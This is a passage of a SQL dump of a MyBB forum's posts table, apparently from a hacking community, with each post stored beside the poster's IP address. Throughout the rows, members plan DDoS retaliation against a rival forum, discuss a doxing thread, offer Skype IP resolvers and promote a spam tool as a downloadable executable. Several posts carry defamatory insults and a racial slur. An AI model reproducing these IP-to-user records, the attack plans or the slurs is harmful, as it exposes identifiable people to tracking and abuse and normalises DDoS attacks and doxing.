'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '3', '??????????¢™', '1350447381', 'LMAO Thanks guys, I am glad you like it.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'ed78b1a9d1c0f8747598fc3f311a8e96', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5006', '43', '105', '7', 'RE: How did you find us?', '0', '205', 'mothered', '1350447455', 'I too, was recommended, and really enjoying my stay here :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'b260f826e4f73d8f7ac3a603d46946ab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5007', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '205', 'mothered', '1350447531', 'This Is simply awesome! Great stuff :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '9b27a048d7635172cc65e150def8cd11', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5008', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '257', 'XxTREYZxX', '1350447588', 'yes please i would really like one thanks so much:)', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '3afe380e2fec298fa1041b0bcdfecd1f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5009', '896', '4892', '23', 'RE: How to secure your Router', '0', '205', 'mothered', '1350447694', 'A very Informative thread Indeed. It\'s amazing how many people utilize WEP, and also leave the default login details as Is. Well done mate, good work.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '9f22a201619fd3f08cb4353fede9dec7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5010', '832', '4370', '25', 'RE: [News] Windows 8 security flaw', '0', '205', 'mothered', '1350447832', 'In the computational field, there\'s always vulnerabilities. You just need to know where and how to find them.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '74edcf61c3f4429deb268ef9c56e085d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5011', '43', '105', '7', 'RE: How did you find us?', '0', '257', 'XxTREYZxX', '1350447919', 'i was brought here by the admin from another forum which i do not go much because i love this forums its awesome:)', '203.104.11.14', '-882373874', '1', '0', '257', '1350447979', '1', 'e27dce68f2717fc8339b2cd838d7b9b5', '0', '1350447979'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5012', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '1', 't3h jok3r', '1350448176', 'Yo this shit live. I posted on ma Facebook.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '234b6d70c33a49e64f36dfc6a9411c5c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5013', '821', '4294', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '257', 'XxTREYZxX', '1350448254', 'im thinking what i should post next', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'a0a10a0dcd4915945dd0e4373907bd13', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5014', '909', '0', '19', '[Junk]Give me HF rep pl0x...', '0', '222', 'Exposé', '1350448256', 'NVMMMMMM PLEASE DELETE THIS THREAD', '74.76.76.132', '1246514308', '1', '0', '222', '1350448372', '1', '756ca00f45bcf832ed8ce4f32285ffc1', '0', '1350448372'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5017', '909', '5014', '19', 'RE: Give me HF rep pl0x...', '0', '1', 't3h jok3r', '1350448403', 'Ub3r just got repfucked :( stink ass HF staff go around repfucking anyone. I stopped helping their ass.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ec61b243ac421f4067a3005d76a5e035', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5015', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '1', 't3h jok3r', '1350448276', 'I would have shared this on HackForums too but unfortunately banned.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '321e84e7ec41fcbcca82156e324e62e9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5016', '889', '4842', '3', 'RE: Vote for a new theme', '0', '1', 't3h jok3r', '1350448331', 'Can you vote for 3 in the poll?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b34a8d7e8ac75cc08520861123ebe4e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5018', '909', '5014', '19', 'RE: Give me HF rep pl0x...', '0', '1', 't3h jok3r', '1350448455', 'It\'s cool because you are not asking for rep on LH so it\'s allowed.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4273f2b93f06216075dc11d301825f34', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5019', '909', '5014', '19', 'RE: Give me HF rep pl0x...', '0', '222', 'Exposé', '1350448546', 'Yeh I figured but you banned the word Hackf0rums so I said fuck it lmao', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '45d811f46e97dff13045adc7b618a247', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5020', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '222', 'Exposé', '1350448600', 'You got banned on hackforums?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '441e69f55ba6c50111141439561e094b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5021', '910', '0', '49', 'Referral Contest?', '0', '222', 'Exposé', '1350448890', 'Can we have some type of referral contest. That way we are getting new members while getting a prize for it...think this would be fun. :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '50b9ae5f6789716a736799d94a968b60', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5022', '911', '0', '7', 'Anyone have experience in wordpress?', '0', '222', 'Exposé', '1350449054', 'Basically I am launching a video site off another site I have. And the template that I am getting is wordpress. Anyone know how to set it up and add shit...I\'m a nub.', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '42fa6ef6f3f969e77579b6daf76acb4c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5023', '912', '0', '7', 'Woah Awesome. Something you should check.', '0', '5', 'Timmy', '1350449185', 'So seems like the skid Rhythm is planning an attack on L33T Hacking. Now just to let some people know anarchy forum is a site that spammed LH multiple times and DDoSed our site. As you can see in their thread (link below) that Rhythm is nothing but a skid and the proof lies in his thread. He is so-called hiring members to DDoS LH, seems like Anarchy forum has mature people which are queen and crimson as they know what they are talking about but the nigga Rhythm wolen. Do you think we should take them down too? Now I know Jok3r warned us and told us to back off Anarchy forums because they just jumping up high and blaming us for shit. They seem to have a DOX of Jok3r lol but the truth is that Jok3r stole the username from his old buddy from HF with full permission. No one on LH knows Jok3rs real online username except me and Apathy. [b]THEY LIKE ADVERTISING OUR SITE FOR FREE SO LETS HIT THEM OFFLINE ONLY IF THEY DO SOMETHING TO US.[/b]', '72.231.24.165', '1223104677', '1', '0', '5', '1350449229', '1', '3e865ef5f174d32c35cd4e33f0a98ba0', '0', '1350449229'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5024', '913', '0', '7', 'Anarchyforums.net - Owner is a well known scammer', '0', '5', 'Timmy', '1350449280', 'Anarchforums.net owner is a scammer and a butthurt. He likes sucking mad dicks.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e33b966526cd44d0795f990df78ee2c9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5025', '913', '5024', '7', 'RE: Anarchyforums.net - Owner is a well known scammer', '0', '7', 'Romdu62', '1350449326', 'Bump. Do not remove, they are defaming us and we will do the same thing.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'eb901946132a92cfbcbb1db37d2c2597', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5026', '913', '5024', '7', 'RE: Anarchyforums.net - Owner is a well known scammer', '0', '222', 'Exposé', '1350449326', 'Lol what did you base this assumption off of? LMAOROFLCOPTER', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '7b8040a5e075ad2dfe5aaaeb7546b871', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5027', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '7', 'Romdu62', '1350449365', 'I\'m up for this. I will also retaliate if they do hopefully Jok3r has no problems.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '538cfda885980a3181cb695cc7ab1da0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5028', '913', '5024', '7', 'RE: Anarchyforums.net - Owner is a well known scammer', '0', '3', '??????????¢™', '1350449390', 'LMAO FUCKING SCAMMER, HOW CAN A SCAMMER OWN A FORUM?', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '37808832828cc04c20328d4309e6448e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5029', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '1', 't3h jok3r', '1350449406', 'Do what you guys want to do because I have no control over my members, your life so do as you wish.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '66a70a880166c86542f6b6f00809aeb8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5030', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '222', 'Exposé', '1350449466', 'This thread should be closed. We should not start this threads and retaliate. Jok3r should handle this with AF.', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'ccee7736a5edd8bef9a760e507069dc4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5031', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '3', '??????????¢™', '1350450027', 'I will not do anything to their site unless they do something to LH.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'd02326174fd3a187207808d83fd182e7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5032', '907', '5012', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '3', '??????????¢™', '1350450092', '[quote=\'t3h jok3r\' pid=\'5012\' dateline=\'1350448176\'] Yo this shit live. I posted on ma Facebook. [/quote] LOL Thanks man I appreciate it.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'bcf6500f3f302fd9e7a5badf8eb1edb0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5033', '899', '4919', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '3', '??????????¢™', '1350450258', 'The site doesnt load for me.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'cb035439c5cc085771388d22edac82cc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5034', '910', '5021', '49', 'RE: Referral Contest?', '0', '3', '??????????¢™', '1350450327', 'This would be a great thing but who is going to provide the prize. J0ker cant because he doesnt have money and when he gets some he will need it for the hosting.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '684059e4d2f8737d764b431dcde2fe37', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5035', '899', '4919', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '222', 'Exposé', '1350450527', 'Yeh sorry bro...not working for me', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '5f6ab6d11159fde13f9d11479ac5f384', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5036', '909', '5014', '19', '[Junk]Give me HF rep pl0x...', '0', '1', 't3h jok3r', '1350450592', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5037', '910', '5021', '49', 'RE: Referral Contest?', '0', '222', 'Exposé', '1350450603', 'Lol I can provide a small cash prize...like 20$ or so...but what if I win lmao', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '42ae9d7fe7dd0adffbf0e559f68d18e2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5038', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '1', 't3h jok3r', '1350450646', 'Yeah for advertising but Omni forgot that I once saved him from $200 loss.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd60ffd38fd75a06476b9c42b31cf1b5a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5039', '912', '5030', '7', 'RE: Woah Awesome. Something you should check.', '0', '1', 't3h jok3r', '1350450723', '[quote=\'ƒ???????????g\' pid=\'5030\' dateline=\'1350449466\'] This thread should be closed. We should not start this threads and retaliate. Jok3r should handle this with AF. [/quote] I tried but the owner likes being a baby and tries to reach the sky so I\'m leaving it on LH.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1042af726816f0c4173fe59443bfe7dc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5040', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '222', 'Exposé', '1350450985', 'Lol alright...I guess :P......', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'b35f7b6f8cf734e09ef20e397c64a303', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5041', '914', '0', '7', 'Advertise on Pasteheaven!', '0', '222', 'Exposé', '1350451233', 'Make sure you guys check out http://pasteheaven.com. I started a paste called L33thacking.com. Make sure you guys register and bump it. It might go to the top or something. Not sure :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '460a968312ca7fcc16e92c776a5c6aba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5042', '43', '105', '7', 'RE: How did you find us?', '0', '228', 'VirtualLegend', '1350451316', 'Brought here By The Joker, Thanks for letting me join this awesome forum', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '8b02ea4cab403ca2e6ba3e82e1dfb532', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5043', '915', '0', '7', 'PasteIT AIO - By ƒ???????????g', '0', '222', 'Exposé', '1350454860', 'Nothing complex but...Decided to make this quick in order for you guys to be able to advertise on pasteheaven....I will make one for pastebin soon.... Screenshots: [img]http://new.tinygrab.com/65dd32dbe5f3273f2e769e69fc2e3c0a4b4bfd84a4.png[/img] [img]http://new.tinygrab.com/65dd32dbe5dcdd743fc759fccf505a397797abf673.png[/img] What you have to do: 1) Just click the advertise button 2) Check http://pasteheaven.com after and check if it worked Sourcecode: [color=#FF0000]Pm me if you want the sourcecode...[/color] Download the program here : http://www.2shared.com/file/oiB-xCAf/setup.html (and yes its a setup.exe file which is what the compiler for visual studio makes) [size=medium][color=#32CD32]Don\'t run the program too much cause they will probably delete the pastes or ban the name...or implement a captcha system. And they can\'t track you because they dont keep ip logs....so we dont need proxies :D[/color][/size]', '74.76.76.132', '1246514308', '1', '0', '222', '1350495461', '1', '04634bbb9cc089a5940a123b144c85c9', '0', '1350495461'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5044', '126', '315', '15', 'RE: Adf.ly Bot', '0', '222', 'Exposé', '1350455914', 'Wait do you know jlim....I was on TBN and I know him :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'dad896b3d7723a90bee0485cfd5e386d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5045', '126', '315', '15', 'RE: Adf.ly Bot', '0', '257', 'XxTREYZxX', '1350456807', 'thanks for the great share and keep up the good work as you always do :)', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '0cd7d9d05ec5a1dc97900a3b1b2600ed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5046', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '257', 'XxTREYZxX', '1350457226', 'yeah ill do anything to help LH :)', '203.104.11.13', '-882373875', '1', '0', '0', '0', '1', '86b29d3133fe462b48847c8e585faaf1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5047', '899', '4919', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '53', 'sirchamp', '1350460098', 'I have my own skype resolver. You can send the usernamme of the guy you want to resolve. I will resolve him For free ;)', '91.112.114.162', '1534096034', '1', '0', '0', '0', '1', '705032e202d6350d1af60cc9ca8ca94e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5048', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '53', 'sirchamp', '1350460244', 'I will when I\'m back home buy.the truboot. So.I can attack them with truboot. Truboot is he strongest bot on hf', '91.112.114.162', '1534096034', '1', '0', '53', '1350460285', '1', '9f27f23e0c90fa3a4fc23377306cbf50', '0', '1350460285'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5049', '915', '5043', '7', 'RE: PasteIT AIO - By ƒ???????????g', '0', '62', 'R?????zo?', '1350460640', 'Thanks I will use this every now and then :)', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', '45727c38a803a325280e5bf1ee7bc82c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5050', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '62', 'R?????zo?', '1350460674', 'No idea why they are doing this to be honest, AF are a bunch of virgin kids imo.', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', '8c30b640ea0ce13ac4cc060039464faa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5051', '914', '5041', '7', 'RE: Advertise on Pasteheaven!', '0', '62', 'R?????zo?', '1350460714', 'will do, thanks for this :)', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', '6718c31455e73c114bbdef13281c8c2c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5052', '899', '5047', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '62', 'R?????zo?', '1350460764', '[quote=\'sirchamp\' pid=\'5047\' dateline=\'1350460098\'] I have my own skype resolver. You can send the usernamme of the guy you want to resolve. I will resolve him For free ;) [/quote] I think the point here is having a skype resolver for LH members, not your own :P', '149.255.32.228', '-1778442012', '1', '0', '62', '1350463473', '1', '2f0d69de79752b4a7709bd70067ce6d4', '0', '1350463473'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5053', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '62', 'R?????zo?', '1350460857', 'I can post that on HF if you want :)', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', 'd3cb8fb637e583d1546cd10226b9381b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5054', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '62', 'R?????zo?', '1350460901', 'Hahaha omg I can\'t stop laughing :DD', '149.255.32.228', '-1778442012', '1', '0', '0', '0', '1', '8141d74b3ba1d10e72bae2433bdeed2b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, 